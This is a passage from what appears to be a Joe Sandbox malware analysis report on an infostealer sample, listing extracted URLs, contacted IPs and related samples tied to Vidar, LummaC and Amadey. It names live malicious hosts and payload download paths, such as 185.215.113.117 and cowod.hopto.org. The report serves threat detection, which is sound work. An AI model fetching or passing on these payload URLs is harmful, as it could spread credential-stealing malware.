                                          https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLInstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.urwpp.deDPlease7AeSqNv1rC.exe, 00000000.00000002.1909075661.000000001CAF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.zhongyicts.com.cn7AeSqNv1rC.exe, 00000000.00000002.1909075661.000000001CAF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94InstallUtil.exe, 00000004.00000002.2454873624.000000000137E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, HIIIEC.4.drfalse
                                            		unknown
                                            https://t.me/ae5ed7AeSqNv1rC.exe, 00000000.00000002.1905965220.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, InstallUtil.exe, 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmptrue
                                            • URL Reputation: malware
                                            		unknown
                                            http://www.mozilla.com/en-US/blocklist/InstallUtil.exe, InstallUtil.exe, 00000004.00000002.2492833314.000000006C6AD000.00000002.00000001.01000000.0000000F.sdmp, InstallUtil.exe, 00000004.00000002.2471746031.0000000028B77000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.4.drfalseunknown
                                            https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=englishInstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://mozilla.org0/InstallUtil.exe, 00000004.00000002.2471746031.0000000028B77000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2477121159.0000000034A58000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2482167987.0000000040931000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2469157795.0000000022C0B000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://185.215.113.117/nholman/xcmd.exe, 0000000C.00000002.2908281971.0000000002C82000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              http://store.steampowered.com/privacy_agreement/InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://store.steampowered.com/points/shop/InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://185.215.113.117/nholman/~cmd.exe, 0000000C.00000002.2908281971.0000000002C82000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=KFHJJD.4.drfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaInstallUtil.exe, 00000004.00000002.2454873624.000000000137E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, HIIIEC.4.drfalse
                                                  		unknown
                                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016InstallUtil.exe, 00000004.00000002.2459809646.000000001C20C000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, IIEHJE.4.drfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://cowod.hopto.DGHCGDInstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://www.ecosia.org/newtab/KFHJJD.4.drfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brBGHJJD.4.drfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&aInstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalseunknown
                                                    https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199780418869[1].htm.4.drfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://store.steampowered.com/privacy_agreement/InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.carterandcone.coml7AeSqNv1rC.exe, 00000000.00000002.1909075661.000000001CAF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=enInstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.fontbureau.com/designers/frere-user.html7AeSqNv1rC.exe, 00000000.00000002.1909075661.000000001CAF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amInstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=englishInstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalseunknown
                                                    https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=englishInstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngInstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesIIEHJE.4.drfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://cowod.FBKEBGDGHCGDInstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://49.12.106.214/freebl3.dlljInstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://steamcommunity.com/wInstallUtil.exe, 00000004.00000002.2454873624.00000000011BC000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                        https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englisInstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalseunknown
                                                        https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCInstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://store.steampowered.com/about/76561199780418869[1].htm.4.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://steamcommunity.com/my/wishlist/InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalseunknown
                                                        https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFBGHJJD.4.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.fontbureau.com/designersG7AeSqNv1rC.exe, 00000000.00000002.1909075661.000000001CAF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=cdfmInstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalseunknown
                                                        http://185.215.113.117/cmd.exe, 0000000C.00000002.2908281971.0000000002CB0000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                        http://185.215.113.117/inc/clip.exe2kkkkm-data;InstallUtil.exe, 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          http://www.fontbureau.com/designers/?7AeSqNv1rC.exe, 00000000.00000002.1909075661.000000001CAF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.founder.com.cn/cn/bThe7AeSqNv1rC.exe, 00000000.00000002.1909075661.000000001CAF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=englishInstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.fontbureau.com/designers?7AeSqNv1rC.exe, 00000000.00000002.1909075661.000000001CAF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://help.steampowered.com/en/InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://steamcommunity.com/market/InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalseunknown
                                                          https://store.steampowered.com/news/InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://49.12.106.214/mozglue.dllpInstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            http://www.tiro.com7AeSqNv1rC.exe, 00000000.00000002.1909075661.000000001CAF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=KFHJJD.4.drfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://store.steampowered.com/subscriber_agreement/InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgInstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                              		unknown
                                                              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallUtil.exe, 00000004.00000002.2459809646.000000001C20C000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, IIEHJE.4.drfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.goodfont.co.kr7AeSqNv1rC.exe, 00000000.00000002.1909075661.000000001CAF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=enInstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://steamcommunity.com/profiles/76561199780418869/inventory/InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                		unknown
                                                                https://steamcommunity.com/discussions/InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                  		unknown
                                                                  http://www.typography.netD7AeSqNv1rC.exe, 00000000.00000002.1909075661.000000001CAF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.galapagosdesign.com/staff/dennis.htm7AeSqNv1rC.exe, 00000000.00000002.1909075661.000000001CAF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://store.steampowered.com/stats/InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                  • URL Reputation: safe
                                                                  		unknown

                                                                  World Map of Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public IPs

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  49.12.106.214
                                                                  		unknownGermany
                                                                  		24940HETZNER-ASDEtrue
                                                                  104.102.49.254
                                                                  		steamcommunity.comUnited States
                                                                  		16625AKAMAI-ASUStrue
                                                                  185.215.113.117
                                                                  		unknownPortugal
                                                                  		206894WHOLESALECONNECTIONSNLfalse
                                                                  45.132.206.251
                                                                  		cowod.hopto.orgRussian Federation
                                                                  		59731LIFELINK-ASRUtrue

                                                                  General Information

                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1528620
                                                                  Start date and time:2024-10-08 04:58:07 +02:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 7m 43s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:18
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:7AeSqNv1rC.exe
                                                                  renamed because original name is a hash value
                                                                  Original Sample Name:f275736a38a6b90825076e8d786ad5c5.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.evad.winEXE@21/22@2/4
                                                                  EGA Information:
                                                                  • Successful, ratio: 50%
                                                                  HCA Information:
                                                                  • Successful, ratio: 94%
                                                                  • Number of executed functions: 121
                                                                  • Number of non-executed functions: 208
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe

                                                                  Warnings

                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Execution Graph export aborted for target 7AeSqNv1rC.exe, PID 7300 because it is empty
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  TimeTypeDescription
                                                                  22:59:05API Interceptor2x Sleep call for process: 7AeSqNv1rC.exe modified
                                                                  22:59:43API Interceptor1x Sleep call for process: InstallUtil.exe modified
                                                                  23:00:46API Interceptor46x Sleep call for process: cmd.exe modified

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  49.12.106.214out.exeGet hashmaliciousVidarBrowse
                                                                    down.exeGet hashmaliciousUnknownBrowse
                                                                      zncaKWwEdq.exeGet hashmaliciousVidarBrowse
                                                                        104.102.49.254http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                        • www.valvesoftware.com/legal.htm
                                                                        185.215.113.117nJohIBtNm5.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, RedLineBrowse
                                                                        • 185.215.113.117/inc/CompleteStudio.exe
                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                        • 185.215.113.117/dobre/splwow64.exe
                                                                        file.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, StealcBrowse
                                                                        • 185.215.113.117/inc/LummaC222222.exe
                                                                        file.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Socks5SystemzBrowse
                                                                        • 185.215.113.117/inc/LummaC222222.exe
                                                                        file.exeGet hashmaliciousAmadey, CryptOne, PureLog Stealer, RedLine, Stealc, Vidar, Zhark RATBrowse
                                                                        • 185.215.113.117/inc/LummaC222222.exe
                                                                        file.exeGet hashmaliciousAmadey, PureLog Stealer, RedLine, Stealc, zgRATBrowse
                                                                        • 185.215.113.117/inc/LummaC222222.exe
                                                                        jD6b7MZOhT.exeGet hashmaliciousAmadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLineBrowse
                                                                        • 185.215.113.117/inc/LummaC222222.exe
                                                                        kGgEIxpC7g.exeGet hashmaliciousMicroClipBrowse
                                                                        • 185.215.113.117/nholman/
                                                                        kGgEIxpC7g.exeGet hashmaliciousDridex Dropper, MicroClipBrowse
                                                                        • 185.215.113.117/nholman/
                                                                        XpCyBwDzEt.exeGet hashmaliciousAmadey, Clipboard Hijacker, CryptOne, Cryptbot, DanaBot, PureLog Stealer, RedLineBrowse
                                                                        • 185.215.113.117/inc/needmoney.exe

                                                                        Domains

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        cowod.hopto.orgVmRHSCaiyc.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 45.132.206.251
                                                                        T2bmenoX1o.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 45.132.206.251
                                                                        Bn7LPdQA1s.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 45.132.206.251
                                                                        WiTqtf1aiE.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 45.132.206.251
                                                                        out.exeGet hashmaliciousVidarBrowse
                                                                        • 45.132.206.251
                                                                        f1r6P3j3g7.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 45.132.206.251
                                                                        VLSiVR4Qxs.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 45.132.206.251
                                                                        down.exeGet hashmaliciousUnknownBrowse
                                                                        • 45.132.206.251
                                                                        zncaKWwEdq.exeGet hashmaliciousVidarBrowse
                                                                        • 45.132.206.251
                                                                        file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 45.132.206.251
                                                                        steamcommunity.comVmRHSCaiyc.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 23.197.127.21
                                                                        j8zJ5Jwja4.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.102.49.254
                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.102.49.254
                                                                        SecuriteInfo.com.Trojan.DownLoader47.43340.27469.30352.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.102.49.254
                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.102.49.254
                                                                        T2bmenoX1o.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 104.102.49.254
                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.102.49.254
                                                                        SecuriteInfo.com.Trojan.DownLoader47.43340.9153.30810.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.102.49.254
                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.102.49.254
                                                                        SecuriteInfo.com.Win32.Evo-gen.11282.4102.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.102.49.254

                                                                        ASNs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        HETZNER-ASDESTlUEqhwpx.exeGet hashmaliciousQuasarBrowse
                                                                        • 195.201.57.90
                                                                        https://url.avanan.click/v2/r01/___https://www.tiktok.com/qnspdA7?fni=6cbb&qfsl=js&xhjsj=gnt_zwq&yfwljy=myyux:ddBBB.lttlqj.ht.zpdzwq?v=frudxdBjlfmjfqymhfwj.ht.pjd.kwjsy___.YXAzOnNvdXRoZXJua2l0Y2hlbmFuZGdyaWxsOmE6bzpiNGZlZGFhNjcxOTBhYjU4MTE5MjBlZTRiYTAxZmUwMTo3OmIxYWM6MDg1ODNlNjljZDkwNThkM2ZiM2RjYTI4MzFjZGY4NGFmMTYyZTlhYmVjYWYxY2Q4MmNkZDhiNmFmOWVkOWUxOTpoOlQ6VA#Sm9hbi5LbmlwcGVuQEVsa2F5LkNvbQ==Get hashmaliciousUnknownBrowse
                                                                        • 46.4.98.169
                                                                        out.exeGet hashmaliciousVidarBrowse
                                                                        • 49.12.106.214
                                                                        down.exeGet hashmaliciousUnknownBrowse
                                                                        • 116.203.9.188
                                                                        BzLGqYKy7o.exeGet hashmaliciousSmokeLoaderBrowse
                                                                        • 188.40.141.211
                                                                        https://cloud.list.lu/index.php/s/znw4dNSttiDzHTBGet hashmaliciousUnknownBrowse
                                                                        • 85.10.195.17
                                                                        UV2uLdRZix.exeGet hashmaliciousSmokeLoaderBrowse
                                                                        • 188.40.141.211
                                                                        PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                        • 148.251.114.233
                                                                        zncaKWwEdq.exeGet hashmaliciousVidarBrowse
                                                                        • 116.203.9.188
                                                                        LKpIHL2abO.exeGet hashmaliciousSmokeLoaderBrowse
                                                                        • 188.40.141.211
                                                                        LIFELINK-ASRUVmRHSCaiyc.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 45.132.206.251
                                                                        T2bmenoX1o.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 45.132.206.251
                                                                        Bn7LPdQA1s.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 45.132.206.251
                                                                        WiTqtf1aiE.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 45.132.206.251
                                                                        out.exeGet hashmaliciousVidarBrowse
                                                                        • 45.132.206.251
                                                                        f1r6P3j3g7.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 45.132.206.251
                                                                        VLSiVR4Qxs.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 45.132.206.251
                                                                        down.exeGet hashmaliciousUnknownBrowse
                                                                        • 45.132.206.251
                                                                        zncaKWwEdq.exeGet hashmaliciousVidarBrowse
                                                                        • 45.132.206.251
                                                                        file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 45.132.206.251
                                                                        WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                                                                        • 185.215.113.37
                                                                        file.exeGet hashmaliciousStealc, VidarBrowse
                                                                        • 185.215.113.37
                                                                        file.exeGet hashmaliciousStealcBrowse
                                                                        • 185.215.113.37
                                                                        file.exeGet hashmaliciousStealcBrowse
                                                                        • 185.215.113.37
                                                                        file.exeGet hashmaliciousStealc, VidarBrowse
                                                                        • 185.215.113.37
                                                                        file.exeGet hashmaliciousStealcBrowse
                                                                        • 185.215.113.37
                                                                        file.exeGet hashmaliciousStealcBrowse
                                                                        • 185.215.113.37
                                                                        file.exeGet hashmaliciousStealc, VidarBrowse
                                                                        • 185.215.113.37
                                                                        file.exeGet hashmaliciousStealcBrowse
                                                                        • 185.215.113.37
                                                                        file.exeGet hashmaliciousStealcBrowse
                                                                        • 185.215.113.37
                                                                        AKAMAI-ASUSj8zJ5Jwja4.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.102.49.254
                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.102.49.254
                                                                        SecuriteInfo.com.Trojan.DownLoader47.43340.27469.30352.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.102.49.254
                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.102.49.254
                                                                        T2bmenoX1o.exeGet hashmaliciousLummaC, VidarBrowse
